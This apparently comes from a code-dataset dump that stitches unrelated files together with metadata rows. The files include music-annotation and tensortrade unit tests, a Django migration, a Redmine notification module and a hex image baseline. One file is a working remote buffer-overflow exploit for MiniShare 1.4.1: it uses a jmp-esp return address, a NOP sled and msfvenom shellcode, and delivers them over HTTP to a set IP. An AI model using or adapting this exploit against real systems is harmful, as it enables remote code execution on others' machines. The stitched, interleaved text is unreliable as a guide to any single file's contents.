                self.assertEqual(expected[key][subkey], actual[key][subkey])
                if actual[key][subkey] is not None:
                    self.assertTrue(os.path.exists(actual[key][subkey]))
                    files.append(actual[key][subkey])
        for fpath in set(files):
            os.remove(fpath)

    def test_one(self):
        # Track with no fullmix annotations at all.
        mtrack = mdb.MultiTrack("AHa_TakeOnMe")
        actual = CMD.get_fullmix_annotations(mtrack, 'data')
        self.assertEqual({mtrack.mix_path: {}}, actual)

    def test_two(self):
        # Vocal and bass annotations available.
        mtrack = mdb.MultiTrack("AcDc_BackInBlack")
        actual = CMD.get_fullmix_annotations(mtrack, 'data')
        expected = {
            mtrack.mix_path: {
                'vocal': 'data/AcDc_BackInBlack_MIX_vocal.txt',
                'bass': 'data/AcDc_BackInBlack_MIX_bass.txt'
            }
        }
        self._verify(expected, actual)

    def test_three(self):
        # Bass and melody available; vocal reported but None.
        mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
        actual = CMD.get_fullmix_annotations(mtrack, 'data')
        expected = {
            mtrack.mix_path: {
                'vocal': None,
                'bass': 'data/MusicDelta_BebopJazz_MIX_bass.txt',
                'melody': 'data/MusicDelta_BebopJazz_MIX_melody.txt'
            }
        }
        self._verify(expected, actual)

    def test_four(self):
        # All tasks reported but none have annotation files.
        mtrack = mdb.MultiTrack("TablaBreakbeatScience_Animoog")
        actual = CMD.get_fullmix_annotations(mtrack, 'data')
        expected = {
            mtrack.mix_path: {
                'vocal': None,
                'bass': None,
                'melody': None
            }
        }
        self._verify(expected, actual)
class TestGetAllAudioAnnotPairs(unittest.TestCase):
    """Test for CMD.get_all_audio_annot_pairs."""

    def test_one(self):
        mtrack = mdb.MultiTrack('AHa_TakeOnMe')
        resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
        replace_path = os.path.join(
            '/Users/rabitt/Dropbox',
            'piano_guitar_resynth/vocalists_replace'
        )
        result = CMD.get_all_audio_annot_pairs(
            mtrack, 'data', resynth_path, replace_path)
        # The function returns the path of the JSON file it wrote.
        self.assertEqual('data/AHa_TakeOnMe_training_pairs.json', result)
        self.assertTrue(os.path.exists(result))
| 37.833988
| 80
| 0.531455
| 4,010
| 38,515
| 4.871571
| 0.053865
| 0.072946
| 0.096545
| 0.055695
| 0.858971
| 0.826107
| 0.797082
| 0.771692
| 0.754441
| 0.728794
| 0
| 0.062587
| 0.344126
| 38,515
| 1,017
| 81
| 37.87119
| 0.71074
| 0
| 0
| 0.659783
| 0
| 0
| 0.178667
| 0.118272
| 0
| 0
| 0
| 0
| 0.118478
| 1
| 0.029348
| false
| 0
| 0.005435
| 0
| 0.048913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0bad58e42c8355e861c7612ae77aef4fd73ce954
| 37
|
py
|
Python
|
rekt_googleplaces/errors.py
|
vengefuldrx/rekt-googleplaces
|
7831ac262577ac47a1700c71b129841d695717fd
|
[
"Apache-2.0"
] | 1
|
2015-09-18T06:31:38.000Z
|
2015-09-18T06:31:38.000Z
|
rekt_googleplaces/errors.py
|
vengefuldrx/rekt-googleplaces
|
7831ac262577ac47a1700c71b129841d695717fd
|
[
"Apache-2.0"
] | null | null | null |
rekt_googleplaces/errors.py
|
vengefuldrx/rekt-googleplaces
|
7831ac262577ac47a1700c71b129841d695717fd
|
[
"Apache-2.0"
] | null | null | null |
from rekt_googlecore.errors import *
| 18.5
| 36
| 0.837838
| 5
| 37
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e7ffdc34a6d02c394ea6b443de8050d6818a5617
| 1,394
|
py
|
Python
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
mostwantedduck/osed-1
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 28
|
2021-05-31T13:41:12.000Z
|
2022-03-29T06:19:18.000Z
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | null | null | null |
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 15
|
2021-05-28T07:39:34.000Z
|
2022-03-09T19:09:28.000Z
|
#!/usr/bin/env python3
# Remote stack-overflow exploit for MiniShare 1.4.1: an overlong HTTP GET
# path overruns a stack buffer, overwriting the saved return address.
from pwn import *
# 1787 bytes of filler to reach the saved return address.
pad = b'A' * 1787
# Return address: a "jmp esp" gadget so execution lands in the payload
# that follows on the stack.
# NOTE(review): the original comment labelled this gadget 0x74ff6c28, but
# the code computes 0x75860000 + 0x6c28 = 0x75866c28 — the module base was
# presumably rebased; verify against the target before use.
ret = p32(0x75860000 + 0x6c28)
# NOP sled: absorbs small inaccuracies in where "jmp esp" lands.
nop = b'\x90' * 64
# Shellcode generated with:
# msfvenom -p windows/exec -b '\x00\x0d' -f py CMD=calc.exe
# (bad chars \x00 and \x0d excluded; encoder stub decodes in place).
buf = b""
buf += b"\xba\x87\x2d\x18\x37\xda\xc2\xd9\x74\x24\xf4\x5f\x33"
buf += b"\xc9\xb1\x31\x31\x57\x13\x03\x57\x13\x83\xc7\x83\xcf"
buf += b"\xed\xcb\x63\x8d\x0e\x34\x73\xf2\x87\xd1\x42\x32\xf3"
buf += b"\x92\xf4\x82\x77\xf6\xf8\x69\xd5\xe3\x8b\x1c\xf2\x04"
buf += b"\x3c\xaa\x24\x2a\xbd\x87\x15\x2d\x3d\xda\x49\x8d\x7c"
buf += b"\x15\x9c\xcc\xb9\x48\x6d\x9c\x12\x06\xc0\x31\x17\x52"
buf += b"\xd9\xba\x6b\x72\x59\x5e\x3b\x75\x48\xf1\x30\x2c\x4a"
buf += b"\xf3\x95\x44\xc3\xeb\xfa\x61\x9d\x80\xc8\x1e\x1c\x41"
buf += b"\x01\xde\xb3\xac\xae\x2d\xcd\xe9\x08\xce\xb8\x03\x6b"
buf += b"\x73\xbb\xd7\x16\xaf\x4e\xcc\xb0\x24\xe8\x28\x41\xe8"
buf += b"\x6f\xba\x4d\x45\xfb\xe4\x51\x58\x28\x9f\x6d\xd1\xcf"
buf += b"\x70\xe4\xa1\xeb\x54\xad\x72\x95\xcd\x0b\xd4\xaa\x0e"
buf += b"\xf4\x89\x0e\x44\x18\xdd\x22\x07\x76\x20\xb0\x3d\x34"
buf += b"\x22\xca\x3d\x68\x4b\xfb\xb6\xe7\x0c\x04\x1d\x4c\xe2"
buf += b"\x4e\x3c\xe4\x6b\x17\xd4\xb5\xf1\xa8\x02\xf9\x0f\x2b"
buf += b"\xa7\x81\xeb\x33\xc2\x84\xb0\xf3\x3e\xf4\xa9\x91\x40"
buf += b"\xab\xca\xb3\x22\x2a\x59\x5f\x8b\xc9\xd9\xfa\xd3"
# Layout: [filler][jmp esp][NOP sled][shellcode].
payload = pad + ret + nop + buf
# Deliver the payload as the GET request path.
r = remote('192.168.122.187', 80)
r.write(b'GET ' + payload + b' HTTP/1.1\r\n\r\n')
| 37.675676
| 62
| 0.663558
| 315
| 1,394
| 2.936508
| 0.609524
| 0.077838
| 0.015135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.249021
| 0.083931
| 1,394
| 36
| 63
| 38.722222
| 0.475333
| 0.071736
| 0
| 0
| 0
| 0.68
| 0.7134
| 0.681642
| 0
| 1
| 0.012393
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f018590d4020a10258c68bbc49f4b6909f694428
| 8,861
|
py
|
Python
|
tests/tensortrade/unit/data/stream/test_node_builder_patterns.py
|
teonlacke/tensortrade
|
b1f441ff4a16940462720d96627f859e0497ab7d
|
[
"Apache-2.0"
] | 34
|
2020-06-05T22:39:53.000Z
|
2022-01-09T03:09:12.000Z
|
tests/tensortrade/unit/data/stream/test_node_builder_patterns.py
|
teonlacke/tensortrade
|
b1f441ff4a16940462720d96627f859e0497ab7d
|
[
"Apache-2.0"
] | 1
|
2022-01-17T06:38:27.000Z
|
2022-01-17T06:38:27.000Z
|
tests/tensortrade/unit/data/stream/test_node_builder_patterns.py
|
teonlacke/tensortrade
|
b1f441ff4a16940462720d96627f859e0497ab7d
|
[
"Apache-2.0"
] | 8
|
2020-06-01T12:09:53.000Z
|
2022-01-18T14:45:29.000Z
|
import pytest
import numpy as np
import pandas as pd
from tensortrade.data import DataFeed, Stream, BinOp
def test_lag():
    """Lag by one step: the first emitted value is NaN, the rest are the
    source values shifted by one position."""
    s1 = Stream([1, 2, 3, 4, 5]).rename("stream")
    assert s1.name == "stream"
    lag = s1.lag()
    # Auto-generated name encodes the operation and the lag amount.
    assert lag.name == "Lag(stream,1)"
    feed = DataFeed([lag])
    feed.compile()
    values = []
    while feed.has_next():
        values += [feed.next()["Lag(stream,1)"]]
    # NOTE(review): nan != nan under ==, so this comparison only passes
    # because CPython's list equality short-circuits on object identity —
    # i.e. the feed must yield the very same np.nan object. Fragile;
    # consider checking math.isnan(values[0]) explicitly.
    assert values == [np.nan, 1, 2, 3, 4]
def test_apply():
    """Applying np.sqrt maps each streamed value element-wise."""
    squares = Stream([1, 4, 9, 16, 25], "s1")
    rooted = squares.apply(np.sqrt).rename("apply")

    feed = DataFeed([rooted])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["apply"])

    assert observed == [1, 2, 3, 4, 5]
def test_add():
    """Adding two streams yields an Add node with element-wise sums."""
    left = Stream([1, 2, 3, 4, 5], "s1")
    assert left.name == "s1"
    right = Stream([1, 2, 3, 4, 5], "s2")
    assert right.name == "s2"

    total = left + right
    assert total.name == "Add(s1,s2)"

    feed = DataFeed([total])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["Add(s1,s2)"])

    assert observed == [2, 4, 6, 8, 10]
def test_sub():
    """Subtracting two streams yields a Subtract node with element-wise differences."""
    left = Stream([2, 3, 4, 5, 6], "s1")
    assert left.name == "s1"
    right = Stream([1, 2, 3, 4, 5], "s2")
    assert right.name == "s2"

    difference = left - right
    assert difference.name == "Subtract(s1,s2)"

    feed = DataFeed([difference])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["Subtract(s1,s2)"])

    assert observed == [1, 1, 1, 1, 1]
def test_truediv():
    """Division works stream/stream, scalar/stream and stream/scalar."""

    def drain(node):
        # Compile a one-node feed and collect every emitted "div" value.
        feed = DataFeed([node])
        feed.compile()
        out = []
        while feed.has_next():
            out.append(feed.next()["div"])
        return out

    numerator = Stream([2, 3, 4, 5, 6], "s1")
    denominator = Stream([2, 3, 4, 5, 6], "s2")
    assert drain((numerator / denominator).rename("div")) == [1, 1, 1, 1, 1]

    ones = Stream([1, 1, 1, 1, 1], "s2")
    assert drain((5 / ones).rename("div")) == [5, 5, 5, 5, 5]

    fives = Stream([5, 5, 5, 5, 5], "s2")
    assert drain((fives / 5).rename("div")) == [1, 1, 1, 1, 1]
def test_log_returns():
    """Log returns computed via explicit lag-subtraction and via diff() both run."""
    price = Stream([200.23, 198.35, 244.36, 266.30, 250.40], "price")
    assert price.name == "price"

    # Manual form: log(p_t) - log(p_{t-1}).
    log_price = price.log()
    manual = log_price - log_price.lag()
    feed = DataFeed([manual])
    feed.compile()
    while feed.has_next():
        print(feed.next())

    # Equivalent form using diff().
    via_diff = price.log().diff().rename("log_return")
    feed = DataFeed([via_diff])
    feed.compile()
    while feed.has_next():
        print(feed.next())
    # pytest.fail("Failed.")
def test_ewma():
    """Stream.ewm(...).mean() matches pandas' ewm mean.

    Covers all four adjust/ignore_na combinations. The original copy-pasted
    version mislabeled the adjust=False cases as "adjust: True" in comments;
    parametrizing removes both the duplication and the stale labels.
    """
    cases = [
        ([5, 2, 4, 6],      {"alpha": 0.68, "adjust": True,  "ignore_na": True}),
        ([5, 2, np.nan, 6], {"alpha": 0.68, "adjust": True,  "ignore_na": False}),
        ([5, 2, np.nan, 6], {"alpha": 0.68, "adjust": False, "ignore_na": True}),
        ([5, 2, np.nan, 6], {"alpha": 0.68, "adjust": False, "ignore_na": False}),
    ]
    for v, spec in cases:
        s = Stream(v, "s")
        mean = s.ewm(**spec).mean().rename("mean")
        feed = DataFeed([mean])
        feed.compile()

        expected = list(pd.Series(v).ewm(**spec).mean())
        actual = []
        while feed.has_next():
            actual.append(feed.next()["mean"])

        assert all(np.isclose(actual, expected))
@pytest.mark.skip(reason="This is equal but says nans are not equal.")
def test_ewa_beginning_na():
    """EWM mean with warmup on a series whose head is NaN (all option combos)."""
    v = [np.nan, 2, np.nan, 6, 8, 5]
    s = Stream(v).rename("s")

    for adjust in (True, False):
        for ignore_na in (True, False):
            spec = {"alpha": 0.68, "adjust": adjust,
                    "ignore_na": ignore_na, "min_periods": 3}
            # The stream API calls pandas' min_periods "warmup".
            kwargs = {key: val for key, val in spec.items() if key != "min_periods"}
            kwargs["warmup"] = spec["min_periods"]

            mean = s.ewm(**kwargs).mean().rename("mean")
            feed = DataFeed([mean])
            feed.compile()

            expected = list(pd.Series(v).ewm(**spec).mean())
            actual = []
            while feed.has_next():
                actual.append(feed.next()["mean"])

            assert all(np.isclose(actual, expected))
@pytest.mark.skip(reason="Data module refactor will fix this.")
def test_ewmv_biased():
    """Biased EWM variance matches pandas for every adjust/ignore_na combo."""
    v = [np.nan, 2, np.nan, 6, 8, 5]
    s = Stream(v).rename("s")

    for adjust in (True, False):
        for ignore_na in (True, False):
            spec = {"alpha": 0.68, "adjust": adjust,
                    "ignore_na": ignore_na, "min_periods": 3}
            # The stream API calls pandas' min_periods "warmup".
            kwargs = {key: val for key, val in spec.items() if key != "min_periods"}
            kwargs["warmup"] = spec["min_periods"]

            var = s.ewm(**kwargs).var(bias=True).rename("var")
            feed = DataFeed([var])
            feed.compile()

            expected = list(pd.Series(v).ewm(**spec).var(bias=True))
            actual = []
            while feed.has_next():
                actual.append(feed.next()["var"])

            assert all(np.isclose(actual, expected))
@pytest.mark.skip(reason="This is equal but says nans are not equal.")
def test_emwmv_unbiased():
    """Unbiased EWM variance matches pandas for every adjust/ignore_na combo."""
    v = [np.nan, 2, np.nan, 6, 8, 5]
    s = Stream(v, "s")

    for adjust in (True, False):
        for ignore_na in (True, False):
            spec = {"alpha": 0.68, "adjust": adjust,
                    "ignore_na": ignore_na, "min_periods": 3}
            # The stream API calls pandas' min_periods "warmup".
            kwargs = {key: val for key, val in spec.items() if key != "min_periods"}
            kwargs["warmup"] = spec["min_periods"]

            var = s.ewm(**kwargs).var(bias=False).rename("var")
            feed = DataFeed([var])
            feed.compile()

            expected = list(pd.Series(v).ewm(**spec).var(bias=False))
            actual = []
            while feed.has_next():
                actual.append(feed.next()["var"])

            assert all(np.isclose(actual, expected))
def test_min():
    """min of two streams is taken element-wise."""
    first = Stream([1, 2, 3, 4], "s1")
    second = Stream([1, 4, 3, 2], "s2")
    node = first.min(second).rename("min")

    feed = DataFeed([node])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["min"])

    assert observed == [1, 2, 3, 2]
def test_max():
    """max of two streams is taken element-wise."""
    first = Stream([1, 2, 3, 4], "s1")
    second = Stream([1, 4, 3, 2], "s2")
    node = first.max(second).rename("max")

    feed = DataFeed([node])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["max"])

    assert observed == [1, 4, 3, 4]
def test_clamp_min():
    """clamp_min(0) replaces every value below zero with zero."""
    source = Stream([1, -2, -3, 0, 5], "s")
    node = source.clamp_min(0).rename("clamp_min")

    feed = DataFeed([node])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["clamp_min"])

    assert observed == [1, 0, 0, 0, 5]
def test_clamp_max():
    """clamp_max(0) replaces every value above zero with zero."""
    source = Stream([1, -2, -3, 0, 5], "s")
    node = source.clamp_max(0).rename("clamp_max")

    feed = DataFeed([node])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["clamp_max"])

    assert observed == [0, -2, -3, 0, 0]
def test_fillna():
    """fillna(-1) substitutes -1 for every NaN in the stream."""
    source = Stream([1, np.nan, -3, np.nan, 5], "s")
    node = source.fillna(-1).rename("fill")

    feed = DataFeed([node])
    feed.compile()

    observed = []
    while feed.has_next():
        observed.append(feed.next()["fill"])

    assert observed == [1, -1, -3, -1, 5]
| 22.097257
| 87
| 0.533348
| 1,271
| 8,861
| 3.645161
| 0.096774
| 0.043169
| 0.054392
| 0.072523
| 0.833801
| 0.824736
| 0.789337
| 0.761278
| 0.724153
| 0.690697
| 0
| 0.050528
| 0.26295
| 8,861
| 400
| 88
| 22.1525
| 0.658858
| 0.022345
| 0
| 0.662651
| 0
| 0
| 0.099734
| 0
| 0
| 0
| 0
| 0
| 0.11245
| 1
| 0.060241
| false
| 0
| 0.016064
| 0
| 0.076305
| 0.008032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f021db100ea9d617b6a8d4e32532f119448bde99
| 1,796
|
py
|
Python
|
correctiv_nursinghomes/migrations/0002_auto_20160523_1220.py
|
correctiv/correctiv-nursinghomes
|
c2037891ca650736cff82a675b0a08ae694a7b9c
|
[
"MIT"
] | 4
|
2016-09-24T07:27:44.000Z
|
2021-12-29T18:31:20.000Z
|
correctiv_nursinghomes/migrations/0002_auto_20160523_1220.py
|
correctiv/correctiv-nursinghomes
|
c2037891ca650736cff82a675b0a08ae694a7b9c
|
[
"MIT"
] | null | null | null |
correctiv_nursinghomes/migrations/0002_auto_20160523_1220.py
|
correctiv/correctiv-nursinghomes
|
c2037891ca650736cff82a675b0a08ae694a7b9c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-23 10:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add boolean care-type and red-flag columns to the NursingHome model.

    Every new column is a BooleanField defaulting to False, so the nine
    AddField operations are generated from a single list of field names.
    """

    dependencies = [
        ('correctiv_nursinghomes', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='nursinghome',
            name=field_name,
            field=models.BooleanField(default=False),
        )
        for field_name in (
            'care_day',
            'care_full',
            'care_night',
            'care_temp',
            'red_flag_decubitus',
            'red_flag_food',
            'red_flag_incontinence',
            'red_flag_medicine',
            'red_flag_pain',
        )
    ]
| 29.442623
| 53
| 0.569599
| 158
| 1,796
| 6.28481
| 0.322785
| 0.163142
| 0.208459
| 0.244713
| 0.749245
| 0.713998
| 0.713998
| 0.667674
| 0.667674
| 0.667674
| 0
| 0.016393
| 0.320713
| 1,796
| 60
| 54
| 29.933333
| 0.797541
| 0.037305
| 0
| 0.679245
| 1
| 0
| 0.145423
| 0.024913
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037736
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f0263863d3f69202580656bdb00a74f6eb6f5d82
| 529
|
py
|
Python
|
app/controller/notificationController.py
|
kirei-open/redmine-api-grabber
|
2bd020c7bdc7b2abdb7839eb7eb5466de84a48e7
|
[
"MIT"
] | null | null | null |
app/controller/notificationController.py
|
kirei-open/redmine-api-grabber
|
2bd020c7bdc7b2abdb7839eb7eb5466de84a48e7
|
[
"MIT"
] | null | null | null |
app/controller/notificationController.py
|
kirei-open/redmine-api-grabber
|
2bd020c7bdc7b2abdb7839eb7eb5466de84a48e7
|
[
"MIT"
] | null | null | null |
from app.services import notification as notificationServices, redmine as redmineServices
def get_birthday():
    """Trigger the birthday notification via Firebase; returns the service result."""
    return notificationServices.send_birthday_firebase()
def absen_masuk_notification():
    """Send the 'absen masuk' notification (presumably clock-in attendance — confirm)."""
    return notificationServices.send_notif_absen_masuk()
def absen_keluar_notification():
    """Send the 'absen keluar' notification (presumably clock-out attendance — confirm)."""
    return notificationServices.send_notif_absen_keluar()
def new_and_over_due_issues():
    """Fetch details for all Redmine projects and push them per device."""
    print('send notification')
    project_details = redmineServices.get_all_project_detail()
    return notificationServices.send_notif_per_device(project_details)
| 33.0625
| 89
| 0.818526
| 60
| 529
| 6.833333
| 0.516667
| 0.253659
| 0.292683
| 0.256098
| 0.253659
| 0.253659
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117202
| 529
| 16
| 90
| 33.0625
| 0.877944
| 0
| 0
| 0
| 0
| 0
| 0.032075
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.363636
| false
| 0
| 0.090909
| 0.272727
| 0.818182
| 0.090909
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
f05268cd6fca689312e1a472236403ddddce8e55
| 37
|
py
|
Python
|
Plugins/Pizza/__init__.py
|
olkab93/SkypeBot
|
2cd4f29b681045c5a1d26dc25551c3dc1d148401
|
[
"MIT"
] | null | null | null |
Plugins/Pizza/__init__.py
|
olkab93/SkypeBot
|
2cd4f29b681045c5a1d26dc25551c3dc1d148401
|
[
"MIT"
] | null | null | null |
Plugins/Pizza/__init__.py
|
olkab93/SkypeBot
|
2cd4f29b681045c5a1d26dc25551c3dc1d148401
|
[
"MIT"
] | null | null | null |
from .PizzaPlugin import PizzaPlugin
| 18.5
| 36
| 0.864865
| 4
| 37
| 8
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f072f8ae18fcb4910aa4bb9d542028193c0d785f
| 24
|
py
|
Python
|
third_party/ros_aarch64/lib/python2.7/dist-packages/pb_msgs/msg/__init__.py
|
silverland79/apollo1.0
|
6e725e8dd5013b769efa18f43e5ae675f4847fbd
|
[
"Apache-2.0"
] | 2
|
2018-01-29T03:10:39.000Z
|
2020-12-08T09:08:41.000Z
|
third_party/ros_aarch64/lib/python2.7/dist-packages/pb_msgs/msg/__init__.py
|
silverland79/apollo1.0
|
6e725e8dd5013b769efa18f43e5ae675f4847fbd
|
[
"Apache-2.0"
] | null | null | null |
third_party/ros_aarch64/lib/python2.7/dist-packages/pb_msgs/msg/__init__.py
|
silverland79/apollo1.0
|
6e725e8dd5013b769efa18f43e5ae675f4847fbd
|
[
"Apache-2.0"
] | 3
|
2018-01-29T12:22:56.000Z
|
2020-12-08T09:08:46.000Z
|
from .time_pb2 import *
| 12
| 23
| 0.75
| 4
| 24
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.166667
| 24
| 1
| 24
| 24
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b2ff97f70a38d1cd0b901c0cb8a2752b65d4b084
| 9,628
|
py
|
Python
|
exif/tests/get_file_baselines/grand_canyon_thumbnail.py
|
chbndrhnns/exif
|
65aa2d8bcdecf79d34752390310222a9bd5d5bb3
|
[
"MIT"
] | null | null | null |
exif/tests/get_file_baselines/grand_canyon_thumbnail.py
|
chbndrhnns/exif
|
65aa2d8bcdecf79d34752390310222a9bd5d5bb3
|
[
"MIT"
] | null | null | null |
exif/tests/get_file_baselines/grand_canyon_thumbnail.py
|
chbndrhnns/exif
|
65aa2d8bcdecf79d34752390310222a9bd5d5bb3
|
[
"MIT"
] | null | null | null |
"""Grand canyon thumbnail."""
from baseline import Baseline
GRAND_CANYON_THUMBNAIL = Baseline("""
ffd8ffdb004300080606070605080707070909080a0c140d0c0b0b0c1912130f141d1a1f1e1d1a1c1c20242e27
20222c231c1c2837292c30313434341f27393d38323c2e333432ffdb0043010909090c0b0c180d0d1832211c21
323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232
3232323232ffc0001108007800a003012100021101031101ffc4001f0000010501010101010100000000000000
000102030405060708090a0bffc400b5100002010303020403050504040000017d010203000411051221314106
13516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a
434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a9293949596
9798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5
e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708
090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108
144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a
535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4
a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4
f5f6f7f8f9faffda000c03010002110311003f00f4d62477a61de7a0ae8218d60ddc530838aa44913a16a88c55
71131318e050013c55137265898f4352080d4b00f2ce7935221da793536289d5d48eb8a5debeb486481c74a717
a8655c89c82def49d2a1b28439a63391c534264a5778e952221db5420f2be6e94c922217814d3115da2623eb4d
fb3bf5ab892c6f90c7b5385b8ee1aaee40e5800ecd5208fd8d26343bca53d452fd9626ea48a9b8c78b24ec4d3b
ec8807534ae507938f5a694a963216041a371e959b45a61f31ed4c68dfd28481b27008e94e0e4569633b8f129a
78901a2c3e61c369f4a3621a109ea2f94b9e9479429dc431a21ea69be5aaf5dd54992c50a9d8b5218c7f78d031
4023f8a9c5914659c0fc690c69b88ffbd9a619a33d2972b0e6431896e805342cb9fe1a7ca2e60db2e7ef63e94c
6593bee34ec1726478ba17fcea4cc27f8e33f46acee55850887a11f9d2f9433c114d489b1208e9c10d1701c10d
2edf5a2e171a507a530c04f6fd6a9321879440ff00ebd06227daaee8571a62ff0068d34c01baff002a2e8433ec
abea7f2a5fb27a1a3990598f5b723de9e2203ad4b65a42796334bb7b62a6e5d8f244d77553a9476c3c43235adc
0262b82aa08e3a118c8e7835a316a9aaa3431c7ac4933b93bd4c4994c6383c75e6b85d668eb54917f52d6757d3
9616fb64325b95fde3181728d9e071ebfcea01aeeb8f710c467b7d9228652221d093fe142afa5c4e8d997175bd
6d3516b43736e51977472a460f1ea467a75a2d7c59a879b109ee2128f2795fbb84925b9e9ce29fd618bd81a49e
25ba17cb6bbedb79e798d81da4e01eb52dbf8b83ed12c7192c485d84f38ebc1ef550ae9bb326542cae5e5f1245
c661ebd39eb53aebf6e4730b8fd45746a63ecc0ebd687a21a85fc456e8706239aa4d8bd931ade24b70b91093ff
0002a8cf89a26cecb7c81c93bbff00ad436c152645ff00096c3ff3edff008fff00f5aa45f165901fbc8dd7e9ce
7e94aec7ecd8f3e28b151ba4495140cf2b8e3f3a587c61a2c92044171231eb84e052e6635043a2f1568b3cef0a
5c0deadb4a8e704f6ae0fe2778d26b28adf4fd2af961924cb4e50e1f6f619ed9acdcdd8ae43cf3518dadeed9ad
24061572d137b1e40ad8b2f105ec7712dec4e8b3c8a3721e5588efec6b99ae64742972b35a7d78dfd8fef2cf20
